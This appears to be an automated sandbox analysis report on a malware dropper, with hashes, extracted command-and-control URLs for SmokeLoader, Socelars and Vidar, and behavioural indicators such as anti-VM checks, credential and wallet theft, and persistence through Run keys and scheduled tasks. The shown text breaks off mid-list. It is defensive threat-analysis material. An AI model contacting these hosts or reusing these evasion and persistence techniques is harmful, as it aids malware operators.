Resubmissions
01-12-2021 21:01
211201-zty57abbb5 1026-11-2021 20:43
211126-zhx4raaae5 1026-11-2021 20:43
211126-zhs5ssegfq 1026-11-2021 20:41
211126-zgtpyaegfp 10Analysis
-
max time kernel
270s -
max time network
1808s -
platform
windows10_x64 -
resource
win10-ja-20211014 -
submitted
26-11-2021 20:43
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20211104
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211104
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211104
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
11.6MB
-
MD5
54703a1521ec4d0d257fd72bcb318971
-
SHA1
40e376a63ff6866eadf5423b5b318fcc25758ffd
-
SHA256
49bc7d63d4e82e6d645b37f79c7e689fbe0f8313152376b14e68d570c99afb82
-
SHA512
6234c583ce20b05881872fd95ae71395ad2509eac1969f1a81b49ef972dec3a9414bf5c90adb243fa99374c838ac1f7ef5fb926778209f2004b8a92d1f12aed8
Malware Config
Extracted
socelars
http://www.ecgbg.com/
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
vidar
48.7
933
https://mstdn.social/@anapa
https://mastodon.social/@mniami
-
profile_id
933
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral5/memory/2964-229-0x0000000000BC0000-0x0000000000C84000-memory.dmp family_redline behavioral5/memory/2964-221-0x0000000000BC0000-0x0000000000C84000-memory.dmp family_redline behavioral5/memory/684-332-0x0000000000418F06-mapping.dmp family_redline behavioral5/memory/4872-354-0x0000000000418F02-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20070cd68c3181d0.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS0638B476\Fri20070cd68c3181d0.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
Processes:
WerFault.exeWerFault.exedescription pid process target process PID 5708 created 5344 5708 WerFault.exe i8J0szz4lKwO2_miCGkGCqGv.exe PID 4900 created 5760 4900 WerFault.exe E7eYbh2xY4wakYvRv8c04SgQ.exe -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral5/memory/3672-443-0x0000000000400000-0x00000000004D8000-memory.dmp family_vidar behavioral5/memory/3672-451-0x00000000021C0000-0x0000000002295000-memory.dmp family_vidar -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\7zS0638B476\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0638B476\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0638B476\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0638B476\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0638B476\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0638B476\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0638B476\libcurl.dll aspack_v212_v242 -
Blocklisted process makes network request 4 IoCs
Processes:
cmd.exeflow pid process 32 3352 cmd.exe 43 3352 cmd.exe 51 3352 cmd.exe 60 3352 cmd.exe -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
PowerOff.exe((((_________456.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts PowerOff.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ((((_________456.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeFri2050c5d6de57ca396.exeFri2064de6352.exeFri2002bea00b158d.exeFri2000bef28b4.exeFri20405c77f8562ea6.exeFri20a252fe0d.exeFri20dd1f5f1511478e4.exeFri2050c5d6de57ca396.exeFri2060e5abb4.exeFri207a27f7f543e5fe.exeFri20070cd68c3181d0.exeFri204accdcd745.exeFri20bc562fa6acd.exeFri20be0777551040f32.exeFri208f6a10911.exeFri2058e26838.exeFri209e1eb19c.exeFri209e1eb19c.exeFri20405c77f8562ea6.tmpFri208f6a10911.tmpFri2000bef28b4.tmpFri20405c77f8562ea6.exeFri20405c77f8562ea6.tmpdSaU40W5.ExEFri2002bea00b158d.exeFri207a27f7f543e5fe.exeFri2002bea00b158d.exewinhostdll.exePowerOff.exeLzmwAqmV.exechrome.exeSoftwareInstaller2191.exeWorldoffer.exeConhost.exechrome update.exesearch_hyperfs_206.exesetup.exeliangzhang-game.exeCalculator Installation.exechrome1.exechrome2.exechrome3.exeChrome5.exeMqoHf2jmuB4cyez7G8eRpLMO.exekPBhgOaGQk.exehoYJfmAmF2q6NsmBkcaOKBij.exe5YEspwpfQGnumbDoOap1JH2G.exebk8jaAWOCs36KODatM9Ky_za.exei8J0szz4lKwO2_miCGkGCqGv.exebk8jaAWOCs36KODatM9Ky_za.exedfQZLvXRQuh9w5xlszfs6bnt.exeHBK5uxATsD4uE8g3Gf1IdkC6.exeJZa9ngAV6sFw_60ELVVCYo6s.exeuvFnNTM_OwsWWwYVzAk2TThf.exePEqh7QE8FYKJ3marOyxYR5pf.exenTHhZBeOYunoFJqJjmEk1CVR.exe2LkewQpxQSeXharHrT4UPazt.exeVFRPXJE3ReuR0JMXC8qDOPOb.exejdgxDHj5WbmK4kyl9sD4xYSv.exeE7eYbh2xY4wakYvRv8c04SgQ.exeSysixocija.exeRazhaemuzhysu.exepid process 4960 setup_installer.exe 4832 setup_install.exe 4728 Fri2050c5d6de57ca396.exe 4296 Fri2064de6352.exe 4292 Fri2002bea00b158d.exe 988 Fri2000bef28b4.exe 1492 Fri20405c77f8562ea6.exe 2964 Fri20a252fe0d.exe 2580 Fri20dd1f5f1511478e4.exe 5012 Fri2050c5d6de57ca396.exe 4392 Fri2060e5abb4.exe 5028 Fri207a27f7f543e5fe.exe 3352 Fri20070cd68c3181d0.exe 4820 Fri204accdcd745.exe 1020 Fri20bc562fa6acd.exe 3616 Fri20be0777551040f32.exe 352 Fri208f6a10911.exe 1272 Fri2058e26838.exe 5020 Fri209e1eb19c.exe 1040 Fri209e1eb19c.exe 1112 Fri20405c77f8562ea6.tmp 3308 Fri208f6a10911.tmp 3300 Fri2000bef28b4.tmp 3232 Fri20405c77f8562ea6.exe 2244 Fri20405c77f8562ea6.tmp 4252 dSaU40W5.ExE 428 Fri2002bea00b158d.exe 684 Fri207a27f7f543e5fe.exe 4872 Fri2002bea00b158d.exe 4948 winhostdll.exe 2384 PowerOff.exe 3668 LzmwAqmV.exe 4920 chrome.exe 3056 SoftwareInstaller2191.exe 3672 Worldoffer.exe 2844 Conhost.exe 1620 chrome update.exe 2064 search_hyperfs_206.exe 3108 setup.exe 2120 liangzhang-game.exe 2108 Calculator Installation.exe 720 chrome1.exe 3392 chrome2.exe 1176 chrome3.exe 1452 Chrome5.exe 1492 MqoHf2jmuB4cyez7G8eRpLMO.exe 4396 kPBhgOaGQk.exe 5268 hoYJfmAmF2q6NsmBkcaOKBij.exe 5280 5YEspwpfQGnumbDoOap1JH2G.exe 5312 bk8jaAWOCs36KODatM9Ky_za.exe 5344 i8J0szz4lKwO2_miCGkGCqGv.exe 5468 bk8jaAWOCs36KODatM9Ky_za.exe 5516 dfQZLvXRQuh9w5xlszfs6bnt.exe 5524 HBK5uxATsD4uE8g3Gf1IdkC6.exe 5548 JZa9ngAV6sFw_60ELVVCYo6s.exe 5764 uvFnNTM_OwsWWwYVzAk2TThf.exe 5772 PEqh7QE8FYKJ3marOyxYR5pf.exe 5864 nTHhZBeOYunoFJqJjmEk1CVR.exe 6032 2LkewQpxQSeXharHrT4UPazt.exe 3532 VFRPXJE3ReuR0JMXC8qDOPOb.exe 5740 jdgxDHj5WbmK4kyl9sD4xYSv.exe 5760 E7eYbh2xY4wakYvRv8c04SgQ.exe 5472 Sysixocija.exe 5260 Razhaemuzhysu.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
MRfygeJgIyPQ1iDpapsWoRM5.exeYQ0mq7JK8CEL08dCPT0wGFk8.exeHBK5uxATsD4uE8g3Gf1IdkC6.exePEqh7QE8FYKJ3marOyxYR5pf.exeuvFnNTM_OwsWWwYVzAk2TThf.exerKwIbNFR9mEqVRBJA_4RLNYd.exerNd9n4JL8_pkhOmu7cmlkdQr.exedfQZLvXRQuh9w5xlszfs6bnt.exe2LkewQpxQSeXharHrT4UPazt.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MRfygeJgIyPQ1iDpapsWoRM5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YQ0mq7JK8CEL08dCPT0wGFk8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YQ0mq7JK8CEL08dCPT0wGFk8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion HBK5uxATsD4uE8g3Gf1IdkC6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion PEqh7QE8FYKJ3marOyxYR5pf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion uvFnNTM_OwsWWwYVzAk2TThf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rKwIbNFR9mEqVRBJA_4RLNYd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rKwIbNFR9mEqVRBJA_4RLNYd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion PEqh7QE8FYKJ3marOyxYR5pf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MRfygeJgIyPQ1iDpapsWoRM5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rNd9n4JL8_pkhOmu7cmlkdQr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dfQZLvXRQuh9w5xlszfs6bnt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion uvFnNTM_OwsWWwYVzAk2TThf.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rNd9n4JL8_pkhOmu7cmlkdQr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dfQZLvXRQuh9w5xlszfs6bnt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion HBK5uxATsD4uE8g3Gf1IdkC6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2LkewQpxQSeXharHrT4UPazt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2LkewQpxQSeXharHrT4UPazt.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Sysixocija.exeWicimuluby.exeFri204accdcd745.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Sysixocija.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Wicimuluby.exe Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Fri204accdcd745.exe -
Drops startup file 1 IoCs
Processes:
2171.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk 2171.exe -
Loads dropped DLL 22 IoCs
Processes:
setup_install.exeFri20405c77f8562ea6.tmpFri208f6a10911.tmpFri20405c77f8562ea6.tmpodbcconf.exeCalculator Installation.exeGS_rdP5EzIIp19vjksQldrip.tmpmsiexec.exeWicimuluby.exepid process 4832 setup_install.exe 4832 setup_install.exe 4832 setup_install.exe 4832 setup_install.exe 4832 setup_install.exe 4832 setup_install.exe 1112 Fri20405c77f8562ea6.tmp 3308 Fri208f6a10911.tmp 2244 Fri20405c77f8562ea6.tmp 4108 odbcconf.exe 2108 Calculator Installation.exe 2108 Calculator Installation.exe 2108 Calculator Installation.exe 2108 Calculator Installation.exe 2108 Calculator Installation.exe 2108 Calculator Installation.exe 6000 GS_rdP5EzIIp19vjksQldrip.tmp 2108 Calculator Installation.exe 2108 Calculator Installation.exe 7064 msiexec.exe 7064 msiexec.exe 5632 Wicimuluby.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
PowerOff.exe((((_________456.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Adobe\\Silunybelo.exe\"" PowerOff.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\WindowsPowerShell\\Xegetecula.exe\"" ((((_________456.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Fri20405c77f8562ea6.tmpPEqh7QE8FYKJ3marOyxYR5pf.exewpM_zvlL_cVVxMp5uxffSY1H.exeMRfygeJgIyPQ1iDpapsWoRM5.exeFri2000bef28b4.tmpmshta.exedSaU40W5.ExEsearch_hyperfs_206.exemshta.exemshta.exerKwIbNFR9mEqVRBJA_4RLNYd.exerNd9n4JL8_pkhOmu7cmlkdQr.exeYQ0mq7JK8CEL08dCPT0wGFk8.exejdgxDHj5WbmK4kyl9sD4xYSv.exeKasaqixawa.exeuvFnNTM_OwsWWwYVzAk2TThf.exe2LkewQpxQSeXharHrT4UPazt.exeRazhaemuzhysu.exeOO~~L.EXemshta.exemshta.exesetup.exeHBK5uxATsD4uE8g3Gf1IdkC6.exemshta.exeFri208f6a10911.tmpdfQZLvXRQuh9w5xlszfs6bnt.exefoldershare.exewinhostdll.exekPBhgOaGQk.exemshta.exemshta.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri20405c77f8562ea6.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA PEqh7QE8FYKJ3marOyxYR5pf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA wpM_zvlL_cVVxMp5uxffSY1H.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA MRfygeJgIyPQ1iDpapsWoRM5.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri2000bef28b4.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dSaU40W5.ExE Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA search_hyperfs_206.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rKwIbNFR9mEqVRBJA_4RLNYd.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rNd9n4JL8_pkhOmu7cmlkdQr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YQ0mq7JK8CEL08dCPT0wGFk8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jdgxDHj5WbmK4kyl9sD4xYSv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Kasaqixawa.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA uvFnNTM_OwsWWwYVzAk2TThf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2LkewQpxQSeXharHrT4UPazt.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Razhaemuzhysu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OO~~L.EXe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA HBK5uxATsD4uE8g3Gf1IdkC6.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Fri208f6a10911.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA dfQZLvXRQuh9w5xlszfs6bnt.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA foldershare.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winhostdll.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kPBhgOaGQk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mshta.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 49 ipinfo.io 236 ipinfo.io 238 ipinfo.io 336 ip-api.com 16 ip-api.com 48 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
9DB9.exedescription ioc process File opened for modification \??\PHYSICALDRIVE0 9DB9.exe -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
Fri20a252fe0d.exeSx_qmYIYsHqBp_wj3Ln1MfV8.exenPxXYSk4D3g_Te137KmG0MuG.exeie71hT9pqInJOii1Rn0NpwwN.exe3A69.exepid process 2964 Fri20a252fe0d.exe 1372 Sx_qmYIYsHqBp_wj3Ln1MfV8.exe 4908 nPxXYSk4D3g_Te137KmG0MuG.exe 2248 ie71hT9pqInJOii1Rn0NpwwN.exe 4348 3A69.exe -
Suspicious use of SetThreadContext 9 IoCs
Processes:
Fri209e1eb19c.exeFri207a27f7f543e5fe.exeFri2002bea00b158d.exebk8jaAWOCs36KODatM9Ky_za.exenTHhZBeOYunoFJqJjmEk1CVR.exe851B.exelqpndjsh.exe5303.exesvchost.exedescription pid process target process PID 5020 set thread context of 1040 5020 Fri209e1eb19c.exe Fri209e1eb19c.exe PID 5028 set thread context of 684 5028 Fri207a27f7f543e5fe.exe Fri207a27f7f543e5fe.exe PID 4292 set thread context of 4872 4292 Fri2002bea00b158d.exe Fri2002bea00b158d.exe PID 5312 set thread context of 5468 5312 bk8jaAWOCs36KODatM9Ky_za.exe bk8jaAWOCs36KODatM9Ky_za.exe PID 5864 set thread context of 2888 5864 nTHhZBeOYunoFJqJjmEk1CVR.exe RegAsm.exe PID 6964 set thread context of 5028 6964 851B.exe 100B.exe PID 4440 set thread context of 680 4440 lqpndjsh.exe svchost.exe PID 6636 set thread context of 1748 6636 5303.exe 5303.exe PID 680 set thread context of 4828 680 svchost.exe svchost.exe -
Drops file in Program Files directory 16 IoCs
Processes:
Fri20405c77f8562ea6.tmpjdgxDHj5WbmK4kyl9sD4xYSv.exePowerOff.exehoYJfmAmF2q6NsmBkcaOKBij.exe((((_________456.exedescription ioc process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Fri20405c77f8562ea6.tmp File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini jdgxDHj5WbmK4kyl9sD4xYSv.exe File created C:\Program Files (x86)\Adobe\Silunybelo.exe PowerOff.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\PBrowserSetp311019.exe jdgxDHj5WbmK4kyl9sD4xYSv.exe File created C:\Program Files (x86)\FarLabUninstaller\is-BS2LP.tmp Fri20405c77f8562ea6.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe hoYJfmAmF2q6NsmBkcaOKBij.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\rtst1039.exe jdgxDHj5WbmK4kyl9sD4xYSv.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe jdgxDHj5WbmK4kyl9sD4xYSv.exe File created C:\Program Files (x86)\Adobe\Silunybelo.exe.config PowerOff.exe File created C:\Program Files (x86)\WindowsPowerShell\Xegetecula.exe ((((_________456.exe File created C:\Program Files (x86)\WindowsPowerShell\Xegetecula.exe.config ((((_________456.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Fri20405c77f8562ea6.tmp File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe hoYJfmAmF2q6NsmBkcaOKBij.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst2.exe jdgxDHj5WbmK4kyl9sD4xYSv.exe File created C:\Program Files\Common Files\FPETCQQQGO\foldershare.exe ((((_________456.exe File created C:\Program Files\Common Files\FPETCQQQGO\foldershare.exe.config ((((_________456.exe -
Drops file in Windows directory 8 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5708 5344 WerFault.exe i8J0szz4lKwO2_miCGkGCqGv.exe 6844 5760 WerFault.exe E7eYbh2xY4wakYvRv8c04SgQ.exe 7112 5760 WerFault.exe E7eYbh2xY4wakYvRv8c04SgQ.exe 6208 5760 WerFault.exe E7eYbh2xY4wakYvRv8c04SgQ.exe 6588 5760 WerFault.exe E7eYbh2xY4wakYvRv8c04SgQ.exe 6356 5760 WerFault.exe E7eYbh2xY4wakYvRv8c04SgQ.exe 1652 5760 WerFault.exe E7eYbh2xY4wakYvRv8c04SgQ.exe 4900 5760 WerFault.exe E7eYbh2xY4wakYvRv8c04SgQ.exe 6568 3524 WerFault.exe tBN4mz42ueVDGnq3iKsMJXj1.exe 6996 4936 WerFault.exe tBN4mz42ueVDGnq3iKsMJXj1.exe 5452 6708 WerFault.exe vbuigcf 4540 6908 WerFault.exe A1CE.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
F698.exeFri2060e5abb4.exebk8jaAWOCs36KODatM9Ky_za.exe100B.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F698.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F698.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI F698.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri2060e5abb4.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri2060e5abb4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bk8jaAWOCs36KODatM9Ky_za.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 100B.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 100B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Fri2060e5abb4.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bk8jaAWOCs36KODatM9Ky_za.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bk8jaAWOCs36KODatM9Ky_za.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 100B.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 3044 schtasks.exe 1788 schtasks.exe 7888 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 2368 timeout.exe 7272 timeout.exe 360 timeout.exe -
Kills process with taskkill 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5248 taskkill.exe 5412 taskkill.exe 360 taskkill.exe 2364 taskkill.exe 4848 taskkill.exe 4564 taskkill.exe 6632 taskkill.exe 1572 taskkill.exe 2080 taskkill.exe -
Processes:
mshta.exemshta.exeMicrosoftEdge.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exedescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Factor = "20" mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\InitHits = "100" mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\International\CpMRU\Cache = a403000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mshta.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created 